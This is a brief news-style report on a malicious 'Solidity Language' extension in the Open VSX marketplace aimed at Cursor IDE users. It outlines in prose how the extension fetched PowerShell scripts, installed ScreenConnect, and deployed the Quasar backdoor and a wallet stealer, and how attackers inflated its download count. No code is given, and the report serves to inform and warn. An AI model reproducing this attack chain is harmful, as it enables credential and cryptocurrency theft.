A sophisticated cyberattack targeted the Cursor IDE—a Visual Studio Code (VSCode) fork popular among developers for its AI-assisted coding features. Attackers published a fake extension called “Solidity Language” in the Open VSX extension marketplace, masquerading as a tool for Ethereum smart contract development. This extension was, in reality, a vehicle for malware distribution and remote access.
Attack Details
The “Solidity Language” extension claimed to offer syntax highlighting for Solidity, but contained no legitimate functionality. Instead, it executed a malicious JavaScript file (extension.js) upon installation. The attackers inflated the extension’s download count to over 54,000, making it appear more popular and trustworthy than the legitimate version. This manipulation helped it rank higher in search results, deceiving even experienced developers.
Once installed, the extension downloaded and executed PowerShell scripts from a remote server. It then installed the legitimate remote management tool ScreenConnect, granting persistent remote access to the victim’s system. Finally, it deployed additional malware, including the Quasar backdoor and a stealer module capable of extracting credentials, wallet passphrases, and sensitive data from browsers, email clients, and crypto wallets.
The Impact
The primary reported victim was a Russian blockchain developer, who lost approximately $500,000 in cryptocurrency after the attackers gained access to his wallet seed phrases and drained his accounts.
